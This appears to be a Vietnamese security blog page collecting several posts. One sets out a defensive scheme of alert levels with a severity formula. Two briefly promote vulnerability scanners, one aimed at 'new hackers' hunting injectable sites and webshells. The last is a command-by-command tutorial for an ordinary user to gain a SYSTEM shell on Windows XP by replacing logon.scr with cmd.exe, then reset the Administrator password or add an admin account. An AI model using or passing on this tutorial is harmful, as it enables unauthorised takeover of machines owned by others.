  • Khi có thể, thực hiện kiểm tra, bổ sung những bản vá, cài đặt anti-virus updates,…ngay lập tức.
d. Cảnh báo:
  • Cảnh báo thông qua đường email riêng của tổ chức, đơn vị hay điện thoại trực tiếp khi tổ chức đưa cảnh báo ở màu cam (hay mức high).
  • Cảnh báo qua website ngay khi mức cảnh báo thay đổi.
  • Cảnh báo thông qua đường email riêng sẽ được gởi đến các tổ chức chính và có liên quan khi bất kì mức độ cảnh báo quốc gia hay tổ chức khác nâng lên mức High (hiển thị cảnh báo màu cam).

5.  Mức 5: severe

muc 5

a. Định nghĩa: Mức này chỉ ra mức độ nguy hiểm cực kì của các hoạt động hacking, virus hay các hoạt động phá hoại khác, dẫn đến sự hỏng hóc trên diện rộng và/hoặc sự phá hủy đáng kể đến hệ thống mà không tìm ra phương pháp cứu chữa, hay làm yếu các đoạn cấu trúc hạ tầng quan trọng. Ở mức độ này, lỗ hổng bị khai thác ở mức độ cực kì nghiêm trọng, hay mức độ phá hủy tài sản cấu trúc hạ tầng quan trọng ở diện rộng.
b. Mô tả cụ thể:
  • Sự cố toàn mạng.
  • Sự cố các ứng dụng quan trọng.
  • Làm hại hay mất quyền điều khiển các hệ thống quan trọng.
  • Mất các hệ thống điều khiển giám sát và thu thập dữ liệu (SCADA).
  • Có khả năng hoặc thật sự mất sự tồn tại hay tác động đáng kể đến nền an ninh kinh tế, an ninh chính trị.
c. Hành động xử lí:
  • Tiếp tục những hoạt động đã được đề cập ở các mức trước.
  • Ngắt các kết nối đến Internet và các đối tác kinh doanh bên ngoài cho đến khi các hoạt động sửa lỗi được đưa ra.
  • Tách những mạng bên trong để chặn hay giảm sự hư hại.
  • Sử dụng những phương pháp truyền thông thay thế như phone, fax hay radio thay cho email hay những phương pháp truyền thông điện tử khác.
d. Cảnh báo:
  • Cảnh báo thông qua đường email riêng của tổ chức, đơn vị, thông qua telephone, pager hay fax sẽ được đưa ra khi mức cảnh báo lên màu đỏ (hoặc mức severe).
  • Cảnh báo thông qua website được thực hiện đồng thời với việc thay đổi mức cảnh báo.
  • Cảnh báo thông qua đường email riêng của tổ chức, đơn vị sẽ được gởi đến tổ chức chính và các tổ chức liên quan khi bất kì mức độ cảnh báo quốc gia hay tổ chức khác nâng lên mức Severe (hiển thị cảnh báo màu đỏ).
Tài sản cơ sở hạ tầng quan trọng: (Critical Infracstructure Assets)
Đối với mục đích của quy trình này, tài sản cơ sở hạ tầng quan trọng được định nghĩa như sau: Tài sản cơ sở hạ tầng quan trọng là những tài sản mang tính chất vật lí hay logic rất quan trọng mà sự rò rỉ, mất khả năng, năng lực, sự phá hoại hay lạm dụng của chúng sẽ tác động ảnh hưởng đến sức khỏe, độ an toàn và giảm an ninh kinh tế.

Phần 2: Phương pháp xác định mức cảnh báo:

1. Công thức:

Để tính mức độ cảnh báo an ninh, cần dựa vào các tham số liên quan đến an ninh của hệ thống như khả năng phòng thủ của hệ thống lúc bị tấn công, khả năng phòng thủ và cơ chế chính sách của các thiết bị an ninh mạng lúc hệ thống bị tấn công, khả năng gây nguy hiểm và mức độ tác động của các phương pháp tấn công, … Từ đó đưa ra các mức cảnh báo cho phù hợp, một hệ thống càng an ninh, càng nhiều thiết bị và các lớp an ninh thì càng ít có khả năng bị đưa vào các mức độ cảnh báo an ninh càng cao. Việc xác định mức cảnh báo được thực hiện theo công thức như chỉ dẫn sau:
Severity= (Criticality+Lethality)-(System CounterMeasures+Network CounterMeasures) Trong đó:
  • Severity:  chỉ số quyết định mức độ cảnh báo an ninh được đưa ra.
  • Criticality: mức độ tác động đến hệ thống.
  • Lethality: mức độ xâm nhập vào hệ thống
  • System Counter Measures: những phương pháp bảo vệ trên host hiện có.
  • Network Counter Measures: những phương pháp bảo vệ thuộc network hiện có

2. Xác định các tham số:

a. Criticality: mức độ tác động đến hệ thống.
Giá trị Mức độ tác động
5 Các core service như các router, firewall, VPN, hệ thống IDS, DNS server hay authentication server (như LDAP)
4 E-mail, web, database và các server ứng dụng quan trọng.
3 Các server ứng dụng ít quan trọng
2 Các hệ thống máy tính dùng trong kinh doanh
1 Người dùng tại nhà
b. Lethality: mức độ xâm nhập vào hệ thống  
Giá trị Mức độ xâm nhập:
5
  • Exploit exists
  • Kẻ tấn công giành được quyền quản trị.
  • Kẻ tấn công thực hiện DoS
4
  • Exploit exists
  • Kẻ tấn công giành được quyền truy cập mức độ user.
  • Kẻ tấn công thực hiện DoS
3
  • No known exploit exists
  • Kẻ tấn công giành được quyền quản trị.
  • Kẻ tấn công có thể làm giảm chất lượng dịch vụ
2
  • No known exploit exists
  • Kẻ tấn công giành được quyền truy cập mức độ user.
1
  • No known exploit exists
  • Kẻ tấn công không thể thực hiện truy cập.
  3. System CounterMeasures: những phương pháp bảo vệ trên host hiện có
Giá trị CounterMeasures
5
  • Hệ điều hành đang lưu hành với những bản patch thích hợp được ứng dụng.
  • Server đã được củng cố, chỉnh sửa thông qua scan lỗ hổng.
  • Chạy IDS hay các bộ kiểm tra tích hợp trên host
  • Antivirus signature hiện hành và được ứng dụng ở hệ thống đích
4
  • Hệ điều hành đang lưu hành với những bản patch thích hợp được ứng dụng.
  • Hệ điều hành đã được củng cố.
  • Antivirus signature hiện hành và được ứng dụng ở hệ thống đích
3
  • Hệ điều hành hiện hành với bản patch cập nhật được ứng dụng.
  • Antivirus signature thông dụng
2
  • Hệ điều hành đang lưu hành nhưng thiết vài bản patch phù hợp.
  • Antivirus signature hoặc không tồn tại hoặc không được ứng dụng vào hệ thống đích.
1
  • Các hệ điều hành cũ như Window NT 3.51, Solaris 2.6, Windows 95/98/ME,
  • Không có phần mềm anti-virus bảo vệ.
d. Network CounterMeasures: phương pháp bảo vệ dựa trên network
Giá trị CounterMeasures
5
  • Firewall hạn chế (từ chối tất cả ngoại trừ những gì được cho phép)
  • Các quy định firewall đã được thông qua bởi việc test sự xâm nhập
  • Tất cả các kết nối bên ngoài bao gồm VPNs phải qua firewall
  • IDS dựa trên network được bổ sung.
  • Email gateway thực hiện lọc các đính kèm bởi virus.
4
  • Firewall hạn chế
  • Những kết nối bên ngoài (VPNs, Wireless, Internet, Business partnet…)  được bảo vệ bởi firewire.
  • Email gateway thực hiện lọc các đính kèm bởi virus.
3
  • Firewall hạn chế
  • Email gateway lọc các đính kèm thực thi thông thường.
2
  • Firewall cho phép (vd: cho phép tất cả nhưng…) hay dịch vụ cho phép (HTML, SMTP, …)
  • Email gateway không thực hiện lọc tất cả các đính kèm bởi virus
1
  • Không có firewall
  • Email gateway không lọc bất kì đính kèm nào.

3. Các mức cảnh báo:

Sử dụng công thức đưa ra như trên, bộ chỉ thị cảnh báo được tạo ra ở các mức độ quan trọng như sau
Mức cảnh báo Giá trị tính được
Xanh lá – Low -8 ~ -5
Xanh dương – Gaurded -4 ~ -2
Vàng – Elevated -1 ~ +2
Cam –High +3 ~ +5
Đỏ – Severe +6 ~ +8

Nguồn Blog
http://mcle8.wordpress.com/2013/01/

Xem Thêm

 

Xcode multiple vulnerability Scanner

XCode Exploit – Vulnurable & webshell Scanner help you to gather the dorks Link from Google. then you may check the results if its Vulnurable to exploit with SQL injection commands, LFI,and XSS. And You may hunt the webshells those uploaded.
scansqlinjection
It is highly user friendly,It’s very helpful for new hackers to find multiple vulnerabilities present on different websites.

Xem Thêm

 

CodeXploiter 1.0 - Tìm kiếm các lỗ hổng trong các file PHP

CodeXploiter is a White-Box scanner used for finding vulnerabilities in PHP files. It scans PHP source code files automatically based on selected rules and configurations.
CodeXploiter helps security professionals to highlight possible vulnerabilities in a timely manner by automating the process of source code analysis. As a result this will let security professionals focus more on vulnerability research and exploit development.
CodeXploiter has a user-friendly interface that suits the needs of security professionals and average users who are interested in the field of vulnerability research and exploit development.

 CodeXploiter_Box_Big 
  • Detects common vulnerabilities such as:
    • SQL Injection
    • Cross Site Scripting (XSS)
    • Remote/Local File Inclusion
    • PHP Code Execution
    • Command Execution
    • File Access
    • File Upload
  • Searches for vulnerabilities in user-defined functions
  • Customizable scan options
  • Vulnerabilities are grouped based on file names and vulnerability type
  • Scan single or multiple files
  • Fast scanner
  • Easy to use and user-friendly Graphical User Interface (GUI)

Download Details:
  • Version: 1.0
  • Size: 3.71 MB
  • System Requirements: Microsoft Windows 8, Microsoft Windows 7, Windows Vista, or Windows XP

Xem Thêm

 

Hack mật khẩu Admin trong Windows XP từ User thường

Bạn chỉ được truy cập vào máy tính Windows với một quyền user thông thường và điều đó khiến bạn bực bội mỗi khi cần cài đặt hay sử dụng một chương trình nào đó. Bài hướng dẫn này sẽ giúp bạn giải tỏa bực bội bằng cách “hack chơi” mật khẩu của Admin mà không cần sử dụng tới một phần mềm thứ ba nào cả.

Lưu ý: Cách này không áp dụng được cho ổ đĩa NTFS

- Vào Start > Run gõ lệnh cmd và nhấn Enter. Cửa sổ lệnh sẽ được mở ra và nhập chính xác các câu lệnh sau:

cd\ trở về thư mục gốc

cd\windows\system32 vào thư mục system32

mkdir hackdir tạo thư mục hackdir

copy logon.scr hackdir\logon.scr sao lưu file logon.scr vào thư mục hackdir

copy cmd.exe hackdir\cmd.exe sao lưu file cmd.exe vào thư mục hackdir

del logon.scr xóa file logon.scr gốc

copy hackdir\cmd.exe logon.scr sao lưu file cmd.exe trong thư mục hackdir trở về system32 và đổi tên thành logon.scr

exit đóng cửa sổ lệnh

- Sau đó khởi động lại máy tính.

Với các câu lệnh trên bạn đã thay đổi file chạy giao diện Windows Welcome thông thường bằng lệnh khởi chạy chương trình cửa sổ lệnh Command Prompt với quyền system chứ không phải quyền user nào cả. Do đó tại cửa sổ lệnh này bạn có thể tiến hành thay đổi mật khẩu của tài khoản Admin trên máy.

Sau khi khởi động lại máy tính, thay vì màn hình Welcome bạn sẽ thấy một cửa sổ lệnh hiện ra.

Tại đây bạn có thể tiến hành theo 1 trong 2 cách sau:

Cách 1: Đổi mật khẩu tài khoản Admin sẵn có

Tại cửa sổ lệnh có thể sử dụng một trong các lệnh sau:

net user <username> <new pass> thay mật khẩu tài khoản quản trị bằng mật khẩu mới
hoặc

net user <username> xóa trắng mật khẩu của tài khoản này

Ví dụ: net user Administrator 123 câu lệnh này đổi mật khẩu tài khoản Administrator thành 123.

Cách 2: Thêm một tài khoản mới với quyền Admin

Tại cửa sổ lệnh lần lượt gõ các lệnh sau:

net user <username> <password> /add thêm một tài khoản với tên và mật khẩu tương ứng

net localgroup Administrators <username> /add đưa tài khoản vừa tạo vào nhóm quản trị

Vậy là thông qua 2 cách này, bạn có thể đăng nhập vào tài khoản vừa tạo hoặc sử dụng mật khẩu vừa đổi của tài khoản Administrator để đăng nhập vào máy tính với quyền quản trị mức cao nhất.

Quan trọng: Đừng quên copy các file trong thư mục hackdir trở về thư mục system32 để hệ thống của bạn hoạt động trở lại như bình thường.

Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương